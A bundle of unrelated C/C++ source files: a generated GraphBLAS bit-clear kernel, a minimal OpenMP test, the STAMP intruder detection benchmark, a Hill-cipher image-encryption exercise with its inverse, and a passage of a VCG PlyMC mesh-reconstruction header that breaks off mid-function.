#define GB_PRAGMA_SIMD_VECTORIZE GB_PRAGMA_SIMD
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_BCLR || GxB_NO_UINT32 || GxB_NO_BCLR_UINT32)
//------------------------------------------------------------------------------
// C += A+B, all 3 matrices dense
//------------------------------------------------------------------------------
#if 0
// The op must be MIN, MAX, PLUS, MINUS, RMINUS, TIMES, DIV, or RDIV.
void GB ((none))
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_accum_template.c"
}
#endif
//------------------------------------------------------------------------------
// C = A+B, all 3 matrices dense
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_ewise3_noaccum__bclr_uint32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_dense_ewise3_noaccum_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += B, accumulate a sparse matrix into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumB__bclr_uint32)
(
GrB_Matrix C,
const GrB_Matrix B,
const int64_t *B_ek_slicing, const int B_ntasks, const int B_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
#include "GB_dense_subassign_23_template.c"
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += b, accumulate a scalar into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumb__bclr_uint32)
(
GrB_Matrix C,
const GB_void *p_bwork,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
// get the scalar b for C += b, of type uint32_t
uint32_t bwork = (*((uint32_t *) p_bwork)) ;
#include "GB_dense_subassign_22_template.c"
return (GrB_SUCCESS) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = A*D, column scale with diagonal D matrix
//------------------------------------------------------------------------------
#if 0
GrB_Info GB ((none))
(
GrB_Matrix C,
const GrB_Matrix A, bool A_is_pattern,
const GrB_Matrix D, bool D_is_pattern,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
uint32_t *restrict Cx = (uint32_t *) C->x ;
#include "GB_AxB_colscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// C = D*B, row scale with diagonal D matrix
//------------------------------------------------------------------------------
#if 0
GrB_Info GB ((none))
(
GrB_Matrix C,
const GrB_Matrix D, bool D_is_pattern,
const GrB_Matrix B, bool B_is_pattern,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
uint32_t *restrict Cx = (uint32_t *) C->x ;
#include "GB_AxB_rowscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// eWiseAdd: C = A+B or C<M> = A+B
//------------------------------------------------------------------------------
GrB_Info GB (_AaddB__bclr_uint32)
(
GrB_Matrix C,
const int C_sparsity,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool Ch_is_Mh,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GB_WERK_DECLARE (M_ek_slicing, int64_t) ;
GB_WERK_DECLARE (A_ek_slicing, int64_t) ;
GB_WERK_DECLARE (B_ek_slicing, int64_t) ;
#include "GB_add_template.c"
GB_FREE_WORK ;
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C = A.*B or C<M> = A.*B
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_01__bclr_uint32)
(
GrB_Matrix C,
const int C_sparsity,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_01_meta.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<#> = A.*B when A is sparse/hyper and B is bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_02__bclr_uint32)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool flipxy,
const int64_t *restrict Cp_kfirst,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if GB_BINOP_FLIP
// The operator is not commutative, and does not have a flipped
// variant. For example z=atan2(y,x).
if (flipxy)
{
// use fmult(y,x)
#undef GB_FLIPPED
#define GB_FLIPPED 1
#include "GB_emult_02_template.c"
}
else
{
// use fmult(x,y)
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
}
#else
// No need to handle the flip: the operator is either commutative, or
// has been handled by changing z=div(y,x) to z=rdiv(x,y) for example.
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
#endif
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<M> = A.*B, M sparse/hyper, A and B bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_03__bclr_uint32)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict Cp_kfirst,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_03_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, C<!M>=A.*B where C is bitmap
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_bitmap__bclr_uint32)
(
GrB_Matrix C,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_bitmap_emult_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (x,Bx): apply a binary operator to a matrix with scalar bind1st
//------------------------------------------------------------------------------
GrB_Info GB (_bind1st__bclr_uint32)
(
GB_void *Cx_output, // Cx and Bx may be aliased
const GB_void *x_input,
const GB_void *Bx_input,
const int8_t *restrict Bb,
int64_t bnz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
uint32_t *Cx = (uint32_t *) Cx_output ;
uint32_t x = (*((uint32_t *) x_input)) ;
uint32_t *Bx = (uint32_t *) Bx_input ;
int64_t p ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < bnz ; p++)
{
if (!GBB (Bb, p)) continue ;
uint32_t bij = GBX (Bx, p, false) ;
Cx [p] = GB_BITCLR (x, bij, uint32_t, 32) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (Ax,y): apply a binary operator to a matrix with scalar bind2nd
//------------------------------------------------------------------------------
GrB_Info GB (_bind2nd__bclr_uint32)
(
GB_void *Cx_output, // Cx and Ax may be aliased
const GB_void *Ax_input,
const GB_void *y_input,
const int8_t *restrict Ab,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
uint32_t *Cx = (uint32_t *) Cx_output ;
uint32_t *Ax = (uint32_t *) Ax_input ;
uint32_t y = (*((uint32_t *) y_input)) ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!GBB (Ab, p)) continue ;
uint32_t aij = GBX (Ax, p, false) ;
Cx [p] = GB_BITCLR (aij, y, uint32_t, 32) ;
}
return (GrB_SUCCESS) ;
#endif
}
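// Note (added for clarity): bind1st fixes the scalar as the *first* operand,
// Cx [p] = GB_BITCLR (x, Bx [p], ...), while bind2nd fixes it as the *second*,
// Cx [p] = GB_BITCLR (Ax [p], y, ...). Since BITCLR is not commutative and has
// no flipped variant, the two kernels genuinely differ, which is why
// GB_BINOP_FLIP is 1 for this operator.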
//------------------------------------------------------------------------------
// C = op (x, A'): transpose and apply a binary operator
//------------------------------------------------------------------------------
// cij = op (x, aij), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
uint32_t aij = GBX (Ax, pA, false) ; \
Cx [pC] = GB_BITCLR (x, aij, uint32_t, 32) ; \
}
GrB_Info GB (_bind1st_tran__bclr_uint32)
(
GrB_Matrix C,
const GB_void *x_input,
const GrB_Matrix A,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
// GB_unop_transpose.c uses GB_ATYPE, but A is
// the 2nd input to binary operator z=f(x,y).
#undef GB_ATYPE
#define GB_ATYPE \
uint32_t
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
uint32_t x = (*((const uint32_t *) x_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
#undef GB_ATYPE
#define GB_ATYPE \
uint32_t
}
//------------------------------------------------------------------------------
// C = op (A', y): transpose and apply a binary operator
//------------------------------------------------------------------------------
// cij = op (aij, y), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
uint32_t aij = GBX (Ax, pA, false) ; \
Cx [pC] = GB_BITCLR (aij, y, uint32_t, 32) ; \
}
GrB_Info GB (_bind2nd_tran__bclr_uint32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GB_void *y_input,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
uint32_t y = (*((const uint32_t *) y_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
ParallelBeginLink.c | int main() {
#pragma omp parallel
{
}
}
|
intruder.c | /* =============================================================================
*
* intruder.c
*
* =============================================================================
*
* Copyright (C) Stanford University, 2006. All Rights Reserved.
* Author: Chi Cao Minh
*
* =============================================================================
*
* For the license of bayes/sort.h and bayes/sort.c, please see the header
* of the files.
*
* ------------------------------------------------------------------------
*
* For the license of kmeans, please see kmeans/LICENSE.kmeans
*
* ------------------------------------------------------------------------
*
* For the license of ssca2, please see ssca2/COPYRIGHT
*
* ------------------------------------------------------------------------
*
* For the license of lib/mt19937ar.c and lib/mt19937ar.h, please see the
* header of the files.
*
* ------------------------------------------------------------------------
*
* For the license of lib/rbtree.h and lib/rbtree.c, please see
* lib/LEGALNOTICE.rbtree and lib/LICENSE.rbtree
*
* ------------------------------------------------------------------------
*
* Unless otherwise noted, the following license applies to STAMP files:
*
* Copyright (c) 2007, Stanford University
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are
* met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* * Neither the name of Stanford University nor the names of its
* contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY STANFORD UNIVERSITY ``AS IS'' AND ANY
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL STANFORD UNIVERSITY BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
* THE POSSIBILITY OF SUCH DAMAGE.
*
* =============================================================================
*/
#include <assert.h>
#include <getopt.h>
#include <stdio.h>
#include <stdlib.h>
#include "decoder.h"
#include "detector.h"
#include "dictionary.h"
#include "packet.h"
#include "stream.h"
#include "thread.h"
#include "timer.h"
#include "tm.h"
enum param_types {
PARAM_ATTACK = (unsigned char)'a',
PARAM_LENGTH = (unsigned char)'l',
PARAM_NUM = (unsigned char)'n',
PARAM_SEED = (unsigned char)'s',
PARAM_THREAD = (unsigned char)'t',
};
enum param_defaults {
PARAM_DEFAULT_ATTACK = 10,
PARAM_DEFAULT_LENGTH = 16,
PARAM_DEFAULT_NUM = 1 << 20,
PARAM_DEFAULT_SEED = 1,
PARAM_DEFAULT_THREAD = 1,
};
long global_params[256] = { /* 256 = ascii limit */
[PARAM_ATTACK] = PARAM_DEFAULT_ATTACK,
[PARAM_LENGTH] = PARAM_DEFAULT_LENGTH,
[PARAM_NUM] = PARAM_DEFAULT_NUM,
[PARAM_SEED] = PARAM_DEFAULT_SEED,
[PARAM_THREAD] = PARAM_DEFAULT_THREAD,
};
typedef struct arg {
/* input: */
stream_t* streamPtr;
decoder_t* decoderPtr;
/* output: */
vector_t** errorVectors;
} arg_t;
/* =============================================================================
* displayUsage
* =============================================================================
*/
static void
displayUsage (const char* appName)
{
printf("Usage: %s [options]\n", appName);
puts("\nOptions: (defaults)\n");
printf(" a <UINT> Percent [a]ttack (%i)\n", PARAM_DEFAULT_ATTACK);
printf(" l <UINT> Max data [l]ength (%i)\n", PARAM_DEFAULT_LENGTH);
printf(" n <UINT> [n]umber of flows (%i)\n", PARAM_DEFAULT_NUM);
printf(" s <UINT> Random [s]eed (%i)\n", PARAM_DEFAULT_SEED);
printf(" t <UINT> Number of [t]hreads (%i)\n", PARAM_DEFAULT_THREAD);
exit(1);
}
/* =============================================================================
* parseArgs
* =============================================================================
*/
static void
parseArgs (long argc, char* const argv[])
{
long i;
long opt;
opterr = 0;
while ((opt = getopt(argc, argv, "a:l:n:s:t:")) != -1) {
switch (opt) {
case 'a':
case 'l':
case 'n':
case 's':
case 't':
global_params[(unsigned char)opt] = atol(optarg);
break;
case '?':
default:
opterr++;
break;
}
}
for (i = optind; i < argc; i++) {
fprintf(stderr, "Non-option argument: %s\n", argv[i]);
opterr++;
}
if (opterr) {
displayUsage(argv[0]);
}
}
/* =============================================================================
* processPackets
* =============================================================================
*/
void
processPackets (void* argPtr)
{
TM_THREAD_ENTER();
long threadId = thread_getId();
stream_t* streamPtr = ((arg_t*)argPtr)->streamPtr;
decoder_t* decoderPtr = ((arg_t*)argPtr)->decoderPtr;
vector_t** errorVectors = ((arg_t*)argPtr)->errorVectors;
detector_t* detectorPtr = PDETECTOR_ALLOC();
assert(detectorPtr);
PDETECTOR_ADDPREPROCESSOR(detectorPtr, &preprocessor_toLower);
vector_t* errorVectorPtr = errorVectors[threadId];
while (1) {
char* bytes;
TM_BEGIN();
bytes = TMSTREAM_GETPACKET(streamPtr);
TM_END();
if (!bytes) {
break;
}
packet_t* packetPtr = (packet_t*)bytes;
long flowId = packetPtr->flowId;
error_t error;
TM_BEGIN();
error = TMDECODER_PROCESS(decoderPtr,
bytes,
(PACKET_HEADER_LENGTH + packetPtr->length));
TM_END();
if (error) {
/*
* Currently, stream_generate() does not create these errors.
*/
assert(0);
bool_t status = PVECTOR_PUSHBACK(errorVectorPtr, (void*)flowId);
assert(status);
}
char* data;
long decodedFlowId;
TM_BEGIN();
data = TMDECODER_GETCOMPLETE(decoderPtr, &decodedFlowId);
TM_END();
if (data) {
error_t error = PDETECTOR_PROCESS(detectorPtr, data);
P_FREE(data);
if (error) {
bool_t status = PVECTOR_PUSHBACK(errorVectorPtr,
(void*)decodedFlowId);
assert(status);
}
}
}
PDETECTOR_FREE(detectorPtr);
TM_THREAD_EXIT();
}
/* =============================================================================
* main
* =============================================================================
*/
MAIN(argc, argv)
{
char exitmsg[1024];
GOTO_REAL();
load_syncchar_map("sync_char.map.intruder");
/*
* Initialization
*/
parseArgs(argc, (char** const)argv);
sprintf(exitmsg, "END BENCHMARK %s-parallel-phase\n", argv[0]);
long numThread = global_params[PARAM_THREAD];
SIM_GET_NUM_CPU(numThread);
TM_STARTUP(numThread);
P_MEMORY_STARTUP(numThread);
thread_startup(numThread);
long percentAttack = global_params[PARAM_ATTACK];
long maxDataLength = global_params[PARAM_LENGTH];
long numFlow = global_params[PARAM_NUM];
long randomSeed = global_params[PARAM_SEED];
printf("Percent attack = %li\n", percentAttack);
printf("Max data length = %li\n", maxDataLength);
printf("Num flow = %li\n", numFlow);
printf("Random seed = %li\n", randomSeed);
dictionary_t* dictionaryPtr = dictionary_alloc();
assert(dictionaryPtr);
stream_t* streamPtr = stream_alloc(percentAttack);
assert(streamPtr);
long numAttack = stream_generate(streamPtr,
dictionaryPtr,
numFlow,
randomSeed,
maxDataLength);
printf("Num attack = %li\n", numAttack);
decoder_t* decoderPtr = decoder_alloc();
assert(decoderPtr);
vector_t** errorVectors = (vector_t**)malloc(numThread * sizeof(vector_t*));
assert(errorVectors);
long i;
for (i = 0; i < numThread; i++) {
vector_t* errorVectorPtr = vector_alloc(numFlow);
assert(errorVectorPtr);
errorVectors[i] = errorVectorPtr;
}
arg_t arg;
arg.streamPtr = streamPtr;
arg.decoderPtr = decoderPtr;
arg.errorVectors = errorVectors;
/*
* Run transactions
*/
TIMER_T startTime;
TIMER_READ(startTime);
OSA_PRINT("entering parallel phase\n",0);
START_INSTRUMENTATION();
GOTO_SIM();
#ifdef OTM
#pragma omp parallel
{
processPackets((void*)&arg);
}
#else
thread_start(processPackets, (void*)&arg);
#endif
GOTO_REAL();
OSA_PRINT("exiting parallel phase\n",0);
OSA_PRINT(exitmsg,0);
    STOP_INSTRUMENTATION();
TIMER_T stopTime;
TIMER_READ(stopTime);
printf("Elapsed time = %f seconds\n", TIMER_DIFF_SECONDS(startTime, stopTime));
/*
* Check solution
*/
long numFound = 0;
for (i = 0; i < numThread; i++) {
vector_t* errorVectorPtr = errorVectors[i];
long e;
long numError = vector_getSize(errorVectorPtr);
numFound += numError;
for (e = 0; e < numError; e++) {
long flowId = (long)vector_at(errorVectorPtr, e);
bool_t status = stream_isAttack(streamPtr, flowId);
assert(status);
}
}
printf("Num found = %li\n", numFound);
assert(numFound == numAttack);
/*
* Clean up
*/
for (i = 0; i < numThread; i++) {
vector_free(errorVectors[i]);
}
free(errorVectors);
decoder_free(decoderPtr);
stream_free(streamPtr);
dictionary_free(dictionaryPtr);
TM_SHUTDOWN();
P_MEMORY_SHUTDOWN();
GOTO_SIM();
thread_shutdown();
MAIN_RETURN(0);
}
/* =============================================================================
*
* End of intruder.c
*
* =============================================================================
*/
|
encrypt.c | /************************************************************************************
File: encrypt.c
Generates the encrypted page
***********************************************************************************/
#include "pixmap.h"
#include <omp.h>
void encrypt (unsigned char *v1, unsigned char *v2)
{
//////////////////////////////////////////////////////////////////////////////////////
/* TO COMPLETE: code to calculate the encryption */
//////////////////////////////////////////////////////////////////////////////////////
int enc_m[2][2] = {{21, 35},{18, 79}};
int n1 = (enc_m[0][0] * *v1 + enc_m[0][1] * *v2) % 256;
int n2 = (enc_m[1][0] * *v1 + enc_m[1][1] * *v2) % 256;
*v1 = n1;
*v2 = n2;
}
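/* For reference (not required here): encrypt() is a 2x2 Hill cipher over
   Z/256. det = 21*79 - 35*18 = 1029, and 1029 mod 256 = 5, which is odd and
   hence invertible (5 * 205 mod 256 = 1), so the page can be decrypted. A
   sketch of the inverse transform; dec_m was derived by hand and satisfies
   enc_m * dec_m = I (mod 256): */
void decrypt (unsigned char *v1, unsigned char *v2)
{
    int dec_m[2][2] = {{67, 249},{150, 209}};
    int n1 = (dec_m[0][0] * *v1 + dec_m[0][1] * *v2) % 256;
    int n2 = (dec_m[1][0] * *v1 + dec_m[1][1] * *v2) % 256;
    *v1 = n1;
    *v2 = n2;
}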
void generate_encrypted_page(page in_page, page *out_page)
{
generate_page(out_page,in_page.h,in_page.w,BLACK);
//////////////////////////////////////////////////////////////////////////////////////
/* TO COMPLETE: code to generate the encrypted page*/
//////////////////////////////////////////////////////////////////////////////////////
int n = (in_page.h*in_page.w);
#pragma omp parallel for schedule(guided)
for(int i = 0; i < n-1; i+=2) {
out_page->dat[i] = in_page.dat[i];
out_page->dat[i+1] = in_page.dat[i+1];
encrypt(&out_page->dat[i], &out_page->dat[i+1]);
}
}
|
uni_plymc_write.h | /*
* plymc.h
* filter_plymc
*
* Created by Paolo Cignoni on 10/23/09.
* Copyright 2009 ISTI - CNR. All rights reserved.
*
*/
#ifndef __PLYMC_H__
#define __PLYMC_H__
#ifndef WIN32
#define _int64 long long
#define __int64 long long
#define __cdecl
#endif
#include <cstdio>
#include <time.h>
#include <float.h>
#include <math.h>
#include <locale>
#include <iostream>
//#include <tchar.h>
#include <list>
#include <limits>
#include <vcg/space/index/grid_static_ptr.h>
#include <vcg/simplex/vertex/base.h>
#include <vcg/simplex/face/base.h>
#include <vcg/complex/used_types.h>
#include <vcg/complex/complex.h>
#include <vcg/complex/algorithms/update/position.h>
#include <vcg/complex/algorithms/update/normal.h>
#include <vcg/complex/algorithms/update/quality.h>
#include <vcg/complex/algorithms/update/edges.h>
#include <vcg/complex/algorithms/update/topology.h>
#include <vcg/complex/algorithms/update/flag.h>
#include <vcg/complex/algorithms/update/bounding.h>
#include <vcg/math/histogram.h>
#include <vcg/complex/algorithms/clean.h>
#include <wrap/io_trimesh/import.h>
#include <wrap/io_trimesh/export_ply.h>
#include <wrap/ply/plystuff.h>
#include <vcg/complex/algorithms/create/marching_cubes.h>
#include <vcg/complex/algorithms/create/extended_marching_cubes.h>
#include "trivial_walker.h"
// local optimization
#include <vcg/complex/algorithms/local_optimization.h>
#include <vcg/complex/algorithms/local_optimization/tri_edge_collapse.h>
#include <vcg/complex/algorithms/local_optimization/tri_edge_collapse_quadric.h>
#include <vcg/simplex/edge/base.h>
#include <stdarg.h>
#include "volume.h"
#include "tri_edge_collapse_mc.h"
#include <osg/Timer>
typedef bool CallBackPosTotal(const int pos, const int total,unsigned long long tick,const char * str );
namespace vcg {
namespace tri {
// Simple prototype for later use...
template<class MeshType>
void MCSimplify( MeshType &m, float perc, bool preserveBB=true, vcg::CallBackPos *cb=0);
template < class SMesh, class MeshProvider>
class PlyMC
{
public:
class MCVertex;
class MCEdge;
class MCFace;
class MCUsedTypes: public vcg::UsedTypes <vcg::Use<MCVertex>::template AsVertexType,
vcg::Use<MCEdge >::template AsEdgeType,
vcg::Use<MCFace >::template AsFaceType >{};
class MCVertex : public Vertex< MCUsedTypes, vertex::Coord3f, vertex::Color4b, vertex::Mark, vertex::VFAdj, vertex::BitFlags, vertex::Qualityf>{};
class MCEdge : public Edge<MCUsedTypes,edge::VertexRef> {
public:
inline MCEdge() {};
inline MCEdge( MCVertex * v0, MCVertex * v1){this->V(0) = v0; this->V(1) = v1; };
static inline MCEdge OrderedEdge(MCVertex* v0,MCVertex* v1){
if(v0<v1) return MCEdge(v0,v1);
else return MCEdge(v1,v0);
}
};
class MCFace : public Face< MCUsedTypes, face::InfoOcf, face::VertexRef, face::FFAdjOcf, face::VFAdjOcf, face::BitFlags> {};
class MCMesh : public vcg::tri::TriMesh< std::vector< MCVertex>, face::vector_ocf< MCFace > > {};
//******************************************
//typedef Voxel<float> Voxelf;
typedef Voxelfc Voxelf;
//******************************************
class Parameter
{
public:
Parameter()
{
NCell=10000;
WideNum= 3;
WideSize=0;
VoxSize=0;
IPosS=Point3i(0,0,0); // SubVolume Start
IPosE=Point3i(0,0,0); // SubVolume End
IPosB=Point3i(0,0,0); // SubVolume to restart from in lexicographic order (useful for crashes)
//IPos=Point3i(0,0,0);
IDiv=Point3i(1,1,1);
VerboseLevel=0;
SliceNum=1;
FillThr=12;
ExpAngleDeg=30;
SmoothNum=1;
RefillNum=1;
IntraSmoothFlag = false;
        QualitySmoothAbs = 0.0f; // 0 means an unset value.
        QualitySmoothVox = 3.0f; // expressed in voxels
OffsetFlag=false;
OffsetThr=-3;
GeodesicQualityFlag=true;
PLYFileQualityFlag=false;
SaveVolumeFlag=false;
SafeBorder=1;
CleaningFlag=false;
SimplificationFlag=false;
VertSplatFlag=false;
MergeColor=false;
basename = "plymcout";
}
int NCell;
int WideNum;
float WideSize;
float VoxSize;
Point3i IPosS; // SubVolume Start
Point3i IPosE; // SubVolume End
Point3i IPosB; // SubVolume to restart from in lexicographic order (useful for crashes)
//Point3i IPos;
Point3i IDiv;
int VerboseLevel;
int SliceNum;
int FillThr;
float ExpAngleDeg;
int SmoothNum;
int RefillNum;
bool IntraSmoothFlag;
      float QualitySmoothAbs; // 0 means an unset value.
      float QualitySmoothVox; // expressed in voxels
bool OffsetFlag;
float OffsetThr;
bool GeodesicQualityFlag;
bool PLYFileQualityFlag;
bool SaveVolumeFlag;
int SafeBorder;
bool CleaningFlag;
bool SimplificationFlag;
bool VertSplatFlag;
bool MergeColor;
std::string basename;
std::vector<std::string> OutNameVec;
std::vector<std::string> OutNameSimpVec;
}; //end Parameter class
/// PLYMC Data
MeshProvider MP;
Parameter p;
// std::vector< std::vector<std::vector<Volume<Voxelf> > > >vVV;
/// PLYMC Methods
bool InitMesh(Volume<Voxelf> &VV,SMesh &m, const char *filename, Matrix44f Tr)
{
typename SMesh::VertexIterator vi;
int loadmask;
int ret = tri::io::Importer<SMesh>::Open(m,filename,loadmask);
tri::Clean<SMesh>::FlipMesh(m);
if(ret)
{
printf("Error: unabe to open mesh '%s'",filename);
return false;
}
if(p.VertSplatFlag)
{
if(!(loadmask & tri::io::Mask::IOM_VERTNORMAL))
{
printf("Error, pointset MUST have normals");
exit(-1);
}
else printf("Ok Pointset has normals\n");
for(vi=m.vert.begin(); vi!=m.vert.end();++vi)
if(math::Abs(SquaredNorm((*vi).N())-1.0)>0.0001)
{
printf("Error: mesh has not per vertex normalized normals\n");
return false;
}
if(!(loadmask & tri::io::Mask::IOM_VERTQUALITY))
tri::UpdateQuality<SMesh>::VertexConstant(m,0);
tri::UpdateNormals<SMesh>::PerVertexMatrix(m,Tr);
//if(!(loadmask & tri::io::Mask::IOM_VERTCOLOR))
// saveMask &= ~tri::io::Mask::IOM_VERTCOLOR;
}
else // processing for triangle meshes
{
if(p.CleaningFlag){
int dup = tri::Clean<SMesh>::RemoveDuplicateVertex(m);
int unref = tri::Clean<SMesh>::RemoveUnreferencedVertex(m);
printf("Removed %i duplicates and %i unref",dup,unref);
}
tri::UpdateNormals<SMesh>::PerVertexNormalizedPerFaceNormalized(m);
if(p.GeodesicQualityFlag) {
tri::UpdateTopology<SMesh>::VertexFace(m);
tri::UpdateFlags<SMesh>::FaceBorderFromVF(m);
tri::UpdateQuality<SMesh>::VertexGeodesicFromBorder(m);
}
}
tri::UpdatePosition<SMesh>::Matrix(m,Tr,false);
tri::UpdateBounding<SMesh>::Box(m);
//printf("Init Mesh %s (%ivn,%ifn)\n",filename,m.vn,m.fn);
for(vi=m.vert.begin(); vi!=m.vert.end();++vi)
VV.Interize((*vi).P());
return true;
}
// This function add a mesh (or a point cloud to the volume)
// the point cloud MUST have normalized vertex normals.
bool AddMeshToVolumeM(Volume<Voxelf> &VV,SMesh &m, std::string meshname, const double w )
{
typename SMesh::VertexIterator vi;
typename SMesh::FaceIterator fi;
if(!m.bbox.Collide(VV.SubBoxSafe)) return false;
size_t found =meshname.find_last_of("/\\");
std::string shortname = meshname.substr(found+1);
Volume <Voxelf> B;
B.Init(VV);
bool res=false;
double quality=0;
// Now add the mesh to the volume
if(!p.VertSplatFlag)
{
float minq=std::numeric_limits<float>::max(), maxq=-std::numeric_limits<float>::max();
      // Compute the per-FACE geodesic quality range as the mean of the per-vertex qualities
for(fi=m.face.begin(); fi!=m.face.end();++fi){
(*fi).Q()=((*fi).V(0)->Q()+(*fi).V(1)->Q()+(*fi).V(2)->Q())/3.0f;
minq=std::min((*fi).Q(),minq);
maxq=std::max((*fi).Q(),maxq);
}
      // The quality is initially expressed as the absolute distance from the mesh border
//printf("Q [%4.2f %4.2f] \n",minq,maxq);
bool closed=false;
      if(minq==maxq) closed=true; // if the mesh is closed, ComputeGeodesicQuality sets the quality to zero everywhere
// Classical approach: scan each face
int tt0=clock();
//printf("---- Face Rasterization");
for(fi=m.face.begin(); fi!=m.face.end();++fi)
{
if(closed || (p.PLYFileQualityFlag==false && p.GeodesicQualityFlag==false)) quality=1.0;
else quality=w*(*fi).Q();
if(quality)
res |= B.ScanFace((*fi).V(0)->P(),(*fi).V(1)->P(),(*fi).V(2)->P(),quality,(*fi).N());
}
//printf("herer\n");
// printf(" : %li\n",clock()-tt0);
} else
{ // Splat approach add only the vertices to the volume
printf("Vertex Splatting\n");
for(vi=m.vert.begin();vi!=m.vert.end();++vi)
{
if(p.PLYFileQualityFlag==false) quality=1.0;
